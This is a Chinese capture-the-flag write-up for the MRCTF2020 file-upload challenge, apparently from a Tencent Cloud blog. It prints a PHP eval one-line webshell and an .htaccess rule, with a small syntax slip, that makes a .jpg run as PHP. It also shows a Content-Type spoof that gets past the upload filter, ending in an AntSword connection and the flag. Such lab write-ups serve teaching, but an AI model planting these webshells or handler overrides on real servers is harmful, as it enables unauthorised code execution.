前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >(.htaccess文件特性)[MRCTF2020]你传你呢 1

(.htaccess文件特性)[MRCTF2020]你传你呢 1

作者头像
用户8909609
发布2023-11-15 10:04:32
1770
发布2023-11-15 10:04:32
举报
文章被收录于专栏:BM CTFBM CTF

题目环境:

image.png
image.png

不难看出是一道文件上传漏洞

上传一句话木马文件 burpsuite进行抓包 <?php @eval($_POST['shell']);?>

命名为PHP文件格式

image.png
image.png

Repeater进行重放

image.png
image.png
image.png
image.png

尝试了其它后缀进行绕过都没有成功 通过 application/x-php内容类型,可以看出被识别出是PHP文件,猜测作者使用了htaccess文件更改了相关配置

了解.htaccess文件

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 注意这几个字“改变文件扩展名”,后面会用到

尝试传入jpg文件(一句话木马不变) 回显结果是否会有所不同

image.png
image.png

发现上传成功 访问上传的文件

image.png
image.png

图片加载失败 到这里猜想使用中国蚁剑是连接不成功的 不过咱们还是按照正常程序走一遍比较好

使用中国蚁剑进行连接

image.png
image.png

返回数据为空 到这里我们的一句话木马并没有被识别出来,或者说并没有执行,猜测被拦截 尝试上传更改后的.htaccess文件

上传.htaccess文件

代码语言:javascript
复制
<FileMatch "1.jpg>
SetHandler application/x-httpd-php
</FileMatch>

上传的一句话木马文件要和1.jpg文件名一模一样 可以把这段代码理解为,将1.jpg文件内容当作PHP文件执行

image.png
image.png

发现被拦截了,更改内容类型为image/jpeg进行绕过

更改Content-Type内容类型为:image/jpeg

image.png
image.png

.htaccess文件上传成功

再次上传1.jpg的木马文件

image.png
image.png
image.png
image.png

上传成功 访问成功 尝试使用蚁剑进行连接

使用中国蚁剑进行连接

image.png
image.png
image.png
image.png
image.png
image.png

得到flag: flag{11711c03-702e-43ac-b1fe-fec6c5297260}

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-11-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档